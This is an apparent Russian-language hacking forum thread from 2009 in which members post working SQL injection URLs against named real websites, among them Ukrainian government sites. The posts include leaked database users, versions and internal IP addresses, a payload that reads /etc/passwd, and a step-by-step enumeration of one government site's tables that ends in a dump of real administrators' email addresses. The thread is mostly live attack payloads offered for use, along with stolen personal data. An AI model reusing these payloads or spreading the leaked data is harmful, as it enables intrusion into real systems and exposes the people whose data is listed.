Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.11.2009, 15:42
|
|
Познающий
Регистрация: 17.11.2008
Сообщений: 48
Провел на форуме:
351316
Репутация:
71
|
|
geogen.ge
Код:
http://www.geogen.ge/index.php?id_menu=51&id_menu_up=&lang=&abc=1&id_let=2+union+all+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7--
5.0.81-community-log:geogenge_geo:geogenge@localhost
Последний раз редактировалось IgAlex; 30.11.2009 в 15:06..
|
|
|
25.11.2009, 18:43
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Код:
http://www.radiochango.com/catala/foros/missatges.php?ID=207&IDM=131265+uNiOn+sElEct+1,concat_ws(0x3a3a,VCH_login,VCH_password),3+from+rc_usuarios+--+
Код:
http://seosamhgriangraf.com/texts.php?menu_id=-3+uNiOn+sElEct+1+--+&menu_order=4
Код:
http://islandtripper.com/islands.php?id=-2+union+select+1,2,3,4+--+
Код:
http://ijpr.iut.ac.ir/magazine.php?magazine=ijpr+union+select+1,file_priv,3,4+from+mysql.user+--+
Код:
http://www.wjxz.com/view.php?id=-502+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
Код:
http://capeclearislandferry.com/texts.php?menu_id=-16+union+select+concat_ws(0x3a3a,user_name,password)+from+control_user+--+&menu_order=5'
Код:
http://www.pvpubs.com/magazine.php?id=-1+union+select+concat_Ws(0x3a3a,username,password)+from+user+--+
|
|
|
|
25.11.2009, 20:24
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
http://www.witec.de/en/company/witecnews/news.php?id=-25+union+select+1,2,concat_ws(0x3a,user(),version( ),database,@@version_compile_os),4,5,6--
user:d004aa52@localhost
version:5.0.45-community-log
database:d004aa52
OS  c-linux-gnu |
|
|
|
26.11.2009, 20:23
|
|
Познающий
Регистрация: 11.10.2009
Сообщений: 33
Провел на форуме:
88588
Репутация:
99
|
|
gymsite@localhost:globalso_gymcan:5.0.67-community
Код:
http://www.gymcan.org/site/news.php?id=-118+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15--
dbo39874005@localhost:db39874005:4.0.27-standard
Код:
http://www.iwr.de/news.php?id=-13392+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7--
dbo251077112@212.227.127.134:db251077112:4.0.27-max-log
Код:
http://www.atomicforce.de/News.php?ID=-47+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5--
dbo161593295@localhost:db161593295:4.0.27-standard
Код:
http://www.busplaner.de/nachricht/news.php?id=-59708+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6--
|
|
|
|
26.11.2009, 20:32
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
http://www.amrophever.com/leader.php?menu=2&id=-4+union+select+concat_ws(0x3a,user,password,file_p riv,0x3a,host)+from+mysql.user
root:[censored]:Y:localhost
MySQL 4.1.20-log
http://www.amrophever.com/leader.php?menu=2&id=-4+union+select+load_file('/etc/passwd') - чтение файлов на сервере
если напрячься и раскрыть пути, то и outfile прокатит
|
|
|
|
27.11.2009, 20:38
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
http://www.ppngo.org
http://www.ppngo.org/news.php?page=1&new=-41+union+select+1,2,convert(concat(login,0x3A,pass wd,0x3A,email),binary),4,5,6,7,8,9,10,11,12+from+u sers+limit+0,1--
http://www.ppngo.org/news.php?page=1&new=-41+union+select+1,2,3,4,5,6,concat_ws(char(58),TAB LE_SCHEMA,TABLE_NAME,COLUMN_NAME),8,9,10,11,12+fro m+INFORMATION_SCHEMA.COLUMNS+limit+362,1--
|
|
|
|
27.11.2009, 22:39
|
|
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
Провел на форуме:
3193846
Репутация:
242
|
|
http://www.windbrake.us/news.php?ID=-823+and+0+union+select+1,concat_ws(0x3a,user(),dat abase(%20%20),version()),3,4,5,6+--+
user - brake@trinity.kiva.net
database - cibf
version - 5.0.26
|
|
|
|
28.11.2009, 18:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.ses.gov.ua/?cont=9&news=8&idr=99999999999999'+union+select+1, concat_ws(0x3a,version(),user(),database(),@@versi on_compile_os)+from+information_schema
офiцiйну сторiнка Державної санiтарно-епiдемiологiчної служби м. Києва
версия: 5.0.76
пользователь: sim3_db6@88.214.192.26
БД:sim3_db6
ОС:unknown-linux-gnu
PostgreSQL
фонд державного майна Украины
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+1,2,3,4,5--+&noanons=noanons&all_news=&page=
имя базы данных: spfu_2
версия: PostgreSQL 8.0.8 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
пользователь spfu
узнаем другие базы
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,datname,null,datname,null+f rom+pg_database%20limit+1+offset+1--+&noanons=noanons&all_news=&page=
перебирал параметром оффсет:
spfu_2
template0
template1
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,table_name,null,null,null+f rom+information_schema.tables+limit+1+offset+0--+&noanons=noanons&all_news=&page=
таблицы
admin
answer
applicable_roles
article
check_constraints
circulate_history
...
узнаем колонки
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,column_name,null,null,null+ from+information_schema.columns+where+table_name=$ $admin$$+limit+1+offset+0--+&noanons=noanons&all_news=&page=
с $$ потому что кавыяка не проходит
надо сразу с типами
атрибуты admin:
email
id
inet_request
name
pr
ящики
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,email,null,null,null+from+a dmin+limit+1+offset+0--+&noanons=noanons&all_news=&page=
_no_spam_natalik@ukr.net(Наташа (личный)
_no_spam_press@spfu.gov.ua(Наташа
askh@ukr.net(Олександр Степанович
kroshka@spfu.gov.ua(з приводу плати за оренду майна
marketing@spfu.gov.ua(Департамент маркетингу ФДМУ
rproekt@i.kiev.ua(Радіопроект
Последний раз редактировалось Strilo4ka; 28.11.2009 в 20:24..
|
|
|
|
28.11.2009, 19:02
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
http://www.belaruslift.com/news.php?id=-23+union+select+1,group_concat(0x3a,login,password ),3,4+from+admins--
http://www.trkvolgamoll.ru/news.php?id=-23+union+select+1,2,group_concat(table_name),4+fro m+information_schema.tables--
http://www.e-portal.com.ua/news.php?id=-23+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13+from+information_schema.tables--
Последний раз редактировалось Bramin; 28.11.2009 в 21:19..
|
|
|
|
28.11.2009, 21:16
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Код:
http://www.garylefevre.com/portfolio/portfolio.php?id=9+union+select+1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9
user:dbo238807836@212.227.29.59
version: 5.0.81-log
database: db238807836
OS: pc-linux-gnu |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
